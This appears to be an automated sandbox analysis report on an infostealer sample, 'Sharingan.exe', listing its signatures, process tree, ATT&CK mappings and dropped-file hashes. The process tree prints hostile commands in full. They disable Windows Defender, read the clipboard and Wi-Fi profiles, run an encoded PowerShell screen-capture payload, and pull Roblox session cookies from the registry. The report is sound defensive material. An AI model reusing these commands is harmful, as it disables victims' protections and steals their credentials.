Analysis

  • max time kernel
    63s
  • max time network
    72s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21-04-2024 01:33

General

  • Target

    Sharingan.exe

  • Size

    6.9MB

  • MD5

    a65aa936034e8a4f22832239d5a9d2bc

  • SHA1

    ee4e1b6e79dd23264ef7addfdad8c8de4bd0c8b1

  • SHA256

    67b70fff711534c5281245bf10b002f9d06bca7f3871be17ae50019c0a25db72

  • SHA512

    6b9c8662319b928c96220a820a0d96e2892850d631d18469cec8c9802330600df2cb2bd2475a47129a7075a4940dfe205c89f17645f007b2301e7026a21b554b

  • SSDEEP

    196608:A1mV1JgB6ylnlPzf+JiJCsmFMvNn6hVvTX:lgBRlnlPSa7mmvN+rX

Score
7/10

Malware Config

Signatures

  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 52 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Enumerates processes with tasklist 1 TTPs 3 IoCs
  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Kills process with taskkill 7 IoCs
  • Suspicious behavior: EnumeratesProcesses 16 IoCs
  • Suspicious use of AdjustPrivilegeToken 58 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Sharingan.exe
    "C:\Users\Admin\AppData\Local\Temp\Sharingan.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4000
    • C:\Users\Admin\AppData\Local\Temp\Sharingan.exe
      "C:\Users\Admin\AppData\Local\Temp\Sharingan.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2076
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sharingan.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:5108
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sharingan.exe'
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2892
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2348
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1972
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4784
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:548
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2584
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:4552
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2516
        • C:\Windows\System32\Wbem\WMIC.exe
          WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:3092
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4092
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Get-Clipboard
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4284
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1624
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:4724
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2876
        • C:\Windows\system32\tree.com
          tree /A /F
          4⤵
            PID:2728
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1048
          • C:\Windows\system32\netsh.exe
            netsh wlan show profile
            4⤵
              PID:1680
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "systeminfo"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:1600
            • C:\Windows\system32\systeminfo.exe
              systeminfo
              4⤵
              • Gathers system information
              PID:1076
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:1564
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
              4⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:3972
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\u03ojksv\u03ojksv.cmdline"
                5⤵
                  PID:2328
                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE76D.tmp" "c:\Users\Admin\AppData\Local\Temp\u03ojksv\CSC23524EAF91934FE89F4941CE9B2F684B.TMP"
                    6⤵
                      PID:1992
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "tree /A /F"
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:64
                • C:\Windows\system32\tree.com
                  tree /A /F
                  4⤵
                    PID:3564
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:3616
                  • C:\Windows\system32\tree.com
                    tree /A /F
                    4⤵
                      PID:4716
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                    3⤵
                    • Suspicious use of WriteProcessMemory
                    PID:3216
                    • C:\Windows\system32\tree.com
                      tree /A /F
                      4⤵
                        PID:4540
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                      3⤵
                      • Suspicious use of WriteProcessMemory
                      PID:3488
                      • C:\Windows\system32\tree.com
                        tree /A /F
                        4⤵
                          PID:1040
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                        3⤵
                          PID:4064
                          • C:\Windows\system32\tree.com
                            tree /A /F
                            4⤵
                              PID:3832
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4568"
                            3⤵
                              PID:4772
                              • C:\Windows\system32\taskkill.exe
                                taskkill /F /PID 4568
                                4⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:3380
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4848"
                              3⤵
                                PID:3216
                                • C:\Windows\system32\taskkill.exe
                                  taskkill /F /PID 4848
                                  4⤵
                                  • Kills process with taskkill
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2380
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3340"
                                3⤵
                                  PID:820
                                  • C:\Windows\system32\taskkill.exe
                                    taskkill /F /PID 3340
                                    4⤵
                                    • Kills process with taskkill
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:3656
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3996"
                                  3⤵
                                    PID:4460
                                    • C:\Windows\system32\taskkill.exe
                                      taskkill /F /PID 3996
                                      4⤵
                                      • Kills process with taskkill
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:3964
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4744"
                                    3⤵
                                      PID:4048
                                      • C:\Windows\system32\taskkill.exe
                                        taskkill /F /PID 4744
                                        4⤵
                                        • Kills process with taskkill
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:2516
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2924"
                                      3⤵
                                        PID:3660
                                        • C:\Windows\system32\taskkill.exe
                                          taskkill /F /PID 2924
                                          4⤵
                                          • Kills process with taskkill
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:4388
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3624"
                                        3⤵
                                          PID:1004
                                          • C:\Windows\system32\taskkill.exe
                                            taskkill /F /PID 3624
                                            4⤵
                                            • Kills process with taskkill
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:1624
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                          3⤵
                                            PID:4440
                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                              4⤵
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:3948
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                            3⤵
                                              PID:2156
                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                4⤵
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:4704

                                        Network

                                        MITRE ATT&CK Matrix ATT&CK v13

                                        Credential Access

                                        Unsecured Credentials

                                        2
                                        T1552

                                        Credentials In Files

                                        2
                                        T1552.001

                                        Discovery

                                        Process Discovery

                                        1
                                        T1057

                                        System Information Discovery

                                        1
                                        T1082

                                        Collection

                                        Data from Local System

                                        2
                                        T1005

                                        Replay Monitor

                                        Loading Replay Monitor...

                                        Downloads

                                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                          Filesize

                                          2KB

                                          MD5

                                          d85ba6ff808d9e5444a4b369f5bc2730

                                          SHA1

                                          31aa9d96590fff6981b315e0b391b575e4c0804a

                                          SHA256

                                          84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                          SHA512

                                          8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                          Filesize

                                          944B

                                          MD5

                                          62623d22bd9e037191765d5083ce16a3

                                          SHA1

                                          4a07da6872672f715a4780513d95ed8ddeefd259

                                          SHA256

                                          95d79fd575bbd21540e378fcbc1cd00d16f51af62ce15bae7080bb72c24e2010

                                          SHA512

                                          9a448b7a0d867466c2ea04ab84d2a9485d5fd20ab53b2b854f491831ee3f1d781b94d2635f7b0b35cb9f2d373cd52c67570879a56a42ed66bc9db06962ed4992

                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                          Filesize

                                          1KB

                                          MD5

                                          d65d43dd9edcffbfa97cf767f56a9538

                                          SHA1

                                          5d49df662f930f8350c60fa0386bc3f07e305205

                                          SHA256

                                          28a6f5c6f0d4279ce4473b90b67072c4507b8fda58f58d56ec9fda855957be4d

                                          SHA512

                                          34c79ec5577411ca6dc152e977fc7f79ea6892be546610b1c2364db5ef390cf36b8c2f3bf1f53c871c5afe0bad6a11063f2b7b3572556e1aa27c75a5899f6d50

                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                          Filesize

                                          64B

                                          MD5

                                          235a8eb126d835efb2e253459ab8b089

                                          SHA1

                                          293fbf68e6726a5a230c3a42624c01899e35a89f

                                          SHA256

                                          5ffd4a816ae5d1c1a8bdc51d2872b7dd99e9c383c88001d303a6f64a77773686

                                          SHA512

                                          a83d17203b581491e47d65131e1efc8060ff04d1852e3415fc0a341c6a9691ef9f4cf4dd29d2f6d0032a49f2ba4bd36c35b3f472f0ce5f78f4bb139124760e92

                                        • C:\Users\Admin\AppData\Local\Temp\RESE76D.tmp
                                          Filesize

                                          1KB

                                          MD5

                                          685be10096dc1b3c4391a94a15be2d60

                                          SHA1

                                          047f25c35ee7169ba4b4fe6548e8cc6b08e0e9ab

                                          SHA256

                                          244e71f247ee1a156503fde7d5897ac155dd3b6c7c31de40dfb4416636b2c193

                                          SHA512

                                          92f39a30cbc05331763bf8445a611a8bab50c5f81ff4fd318565837ee388188bf610b5a90a7c4a06e294af849a68e4fc39c124cb847def3aace1479465dd0ff1

                                        • C:\Users\Admin\AppData\Local\Temp\_MEI40002\VCRUNTIME140.dll
                                          Filesize

                                          106KB

                                          MD5

                                          870fea4e961e2fbd00110d3783e529be

                                          SHA1

                                          a948e65c6f73d7da4ffde4e8533c098a00cc7311

                                          SHA256

                                          76fdb83fde238226b5bebaf3392ee562e2cb7ca8d3ef75983bf5f9d6c7119644

                                          SHA512

                                          0b636a3cdefa343eb4cb228b391bb657b5b4c20df62889cd1be44c7bee94ffad6ec82dc4db79949edef576bff57867e0d084e0a597bf7bf5c8e4ed1268477e88

                                        • C:\Users\Admin\AppData\Local\Temp\_MEI40002\_bz2.pyd
                                          Filesize

                                          48KB

                                          MD5

                                          83b5d1943ac896a785da5343614b16bc

                                          SHA1

                                          9d94b7f374030fed7f6e876434907561a496f5d9

                                          SHA256

                                          bf79ddbfa1cc4df7987224ee604c71d9e8e7775b9109bf4ff666af189d89398a

                                          SHA512

                                          5e7dcc80ac85bd6dfc4075863731ea8da82edbb3f8ffafba7b235660a1bd0c60f7dfde2f7e835379388de277f9c1ceae7f209495f868cb2bd7db0de16495633c

                                        • C:\Users\Admin\AppData\Local\Temp\_MEI40002\_ctypes.pyd
                                          Filesize

                                          58KB

                                          MD5

                                          7ecc651b0bcf9b93747a710d67f6c457

                                          SHA1

                                          ebb6dcd3998af9fff869184017f2106d7a9c18f3

                                          SHA256

                                          b43963b0883ba2e99f2b7dd2110d33063071656c35e6575fca203595c1c32b1a

                                          SHA512

                                          1ff4837e100bc76f08f4f2e9a7314bcaf23ebfa4f9a82dc97615cde1f3d29416004c6346e51afc6e61360573df5fcd2a3b692fd544ccad5c616fb63ac49303c5

